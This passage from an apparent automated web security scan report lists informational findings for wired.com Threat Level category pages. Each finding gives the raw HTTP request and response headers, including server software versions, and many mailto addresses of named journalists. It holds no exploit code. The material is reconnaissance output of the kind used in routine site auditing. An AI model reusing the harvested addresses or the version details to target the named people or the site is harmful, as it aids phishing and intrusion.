<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.41. http://www.wired.com/threatlevel/category/breaches/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/breaches/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/breaches/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:33 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=260
Expires: Wed, 12 Jan 2011 15:32:57 GMT
Date: Wed, 12 Jan 2011 15:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:msoaresds@uol.com.br">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young&#8217;s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.42. http://www.wired.com/threatlevel/category/censorship/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/censorship/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:10:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=298
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.43. http://www.wired.com/threatlevel/category/chaos-computer-club/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/chaos-computer-club/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/chaos-computer-club/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.44. http://www.wired.com/threatlevel/category/conferences/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/conferences/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/conferences/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:28:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:paul_fisher@condenast.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.45. http://www.wired.com/threatlevel/category/copyrights-and-patents/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/copyrights-and-patents/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/copyrights-and-patents/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=278
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.46. http://www.wired.com/threatlevel/category/coverups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/coverups/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/coverups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=246
Expires: Wed, 12 Jan 2011 15:33:07 GMT
Date: Wed, 12 Jan 2011 15:29:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.47. http://www.wired.com/threatlevel/category/crime/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/crime/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.48. http://www.wired.com/threatlevel/category/crypto/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/crypto/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/crypto/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.49. http://www.wired.com/threatlevel/category/cybarmageddon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cybarmageddon/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/cybarmageddon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.50. http://www.wired.com/threatlevel/category/cyber-warfare/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cyber-warfare/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/cyber-warfare/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.51. http://www.wired.com/threatlevel/category/cyberbullying/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cyberbullying/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/cyberbullying/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.52. http://www.wired.com/threatlevel/category/cybersecurity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/cybersecurity/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /threatlevel/category/cybersecurity/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
